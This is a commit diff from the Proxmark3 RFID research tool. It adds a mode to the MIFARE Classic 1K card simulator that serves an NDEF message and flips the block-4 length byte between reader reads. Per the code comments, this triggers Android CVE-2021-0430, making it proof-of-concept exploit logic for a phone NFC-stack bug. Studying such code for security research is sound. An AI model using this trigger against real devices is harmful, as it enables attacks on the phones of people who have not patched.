github/RRG-Proxmark3
1
0
Fork 0
mirror of https://github.com/RfidResearchGroup/proxmark3.git synced 2025-08-20 21:33:47 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions 4

fiddling with simulating ndef messages on MFC and android

Browse source
This commit is contained in:
iceman1001 2021-05-03 21:47:12 +02:00
commit 218dbafdff
1 changed files with 44 additions and 1 deletions
Download patch file Download diff file Expand all files Collapse all files

45
armsrc/mifaresim.c
View file

@ -519,6 +519,9 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
LED_D_ON(); LED_D_ON();
ResetSspClk(); ResetSspClk();
uint8_t *p_em = BigBuf_get_EM_addr();
uint8_t cve_flipper = 0;
int counter = 0; int counter = 0;
bool finished = false; bool finished = false;
bool button_pushed = BUTTON_PRESS(); bool button_pushed = BUTTON_PRESS();
@ -561,6 +564,10 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
if (res == 2) { //Field is off! if (res == 2) { //Field is off!
//FpgaDisableTracing(); //FpgaDisableTracing();
if ((flags & FLAG_CVE21_0430) == FLAG_CVE21_0430) {
p_em[1] = 0x21;
cve_flipper = 0;
}
LEDsoff(); LEDsoff();
cardSTATE = MFEMUL_NOFIELD; cardSTATE = MFEMUL_NOFIELD;
if (DBGLEVEL >= DBG_EXTENDED) if (DBGLEVEL >= DBG_EXTENDED)
@ -594,6 +601,11 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
LED_B_OFF(); LED_B_OFF();
LED_C_OFF(); LED_C_OFF();
cardSTATE = MFEMUL_SELECT; cardSTATE = MFEMUL_SELECT;
if ((flags & FLAG_CVE21_0430) == FLAG_CVE21_0430) {
p_em[1] = 0x21;
cve_flipper = 0;
}
continue; continue;
} }
@ -849,8 +861,39 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
// case MFEMUL_WORK => CMD READ block // case MFEMUL_WORK => CMD READ block
if (receivedCmd_len == 4 && receivedCmd_dec[0] == ISO14443A_CMD_READBLOCK) { if (receivedCmd_len == 4 && receivedCmd_dec[0] == ISO14443A_CMD_READBLOCK) {
blockNo = receivedCmd_dec[1]; blockNo = receivedCmd_dec[1];
if (DBGLEVEL >= DBG_EXTENDED) Dbprintf("[MFEMUL_WORK] Reader reading block %d (0x%02x)", blockNo, blockNo); if (DBGLEVEL >= DBG_EXTENDED)
Dbprintf("[MFEMUL_WORK] Reader reading block %d (0x%02x)", blockNo, blockNo);
// android CVE 2021_0430
// Simulate a MFC 1K, with a NDEF message.
// these values uses the standard LIBNFC NDEF message
//
// In short, first a value read of block 4,
// update the length byte before second read of block 4.
// on iphone etc there might even be 3 reads of block 4.
// fiddling with when to flip the byte or not, has different effects
if ((flags & FLAG_CVE21_0430) == FLAG_CVE21_0430) {
// first block
if (blockNo == 4) {
p_em += blockNo * 16;
// TLV in NDEF, flip length between
// 4 | 03 21 D1 02 1C 53 70 91 01 09 54 02 65 6E 4C 69
// 0xFF means long length
// 0xFE mean max short length
// We could also have a go at message len byte at p_em[4]...
if (p_em[1] == 0x21 && cve_flipper == 1) {
p_em[1] = 0xFE;
} else {
cve_flipper++;
}
}
}
emlGetMem(response, blockNo, 1); emlGetMem(response, blockNo, 1);
if (DBGLEVEL >= DBG_EXTENDED) { if (DBGLEVEL >= DBG_EXTENDED) {
Dbprintf("[MFEMUL_WORK - ISO14443A_CMD_READBLOCK] Data Block[%d]: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x", blockNo, Dbprintf("[MFEMUL_WORK - ISO14443A_CMD_READBLOCK] Data Block[%d]: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x", blockNo,
response[0], response[1], response[2], response[3], response[4], response[5], response[6], response[0], response[1], response[2], response[3], response[4], response[5], response[6],